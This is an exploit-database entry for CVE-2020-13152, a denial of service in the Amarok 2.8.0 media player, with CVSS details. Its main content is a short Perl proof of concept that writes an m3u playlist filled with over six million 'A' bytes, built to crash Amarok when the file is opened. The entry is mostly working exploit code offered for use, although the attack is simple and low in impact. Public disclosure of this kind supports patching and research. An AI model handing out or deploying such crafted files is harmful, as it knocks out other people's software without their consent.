Amarok 2.8.0 Denial Of Service

2020.11.05

Credit: FishballAndMeatball

Risk: Medium

Local: Yes

Remote: No

CVE: CVE-2020-13152

CWE: CWE-400

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: None

Availability impact: Partial

# Exploit Title: Amarok 2.8.0 - Denial-of-Service
# Date: 1 November 2020
# Exploit Author: FishballAndMeatball
# Vendor Homepage: https://amarok.kde.org/
# Software link: https://community.kde.org/Amarok/GettingStarted/Download
# Version: Amarok 2.8.0
# Tested on: Windows 10, Windows 7, Windows XP
# CVE: CVE-2020-13152

my $file= “test_big.m3u“;
my $junk= “\x41” x 6368545;
open($FILE,”>$file”);
print $FILE “$junk”;
close($FILE);
print “m3u File Created successfully\n”;

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Amarok 2.8.0 Denial Of Service

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Amarok 2.8.0 Denial Of Service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.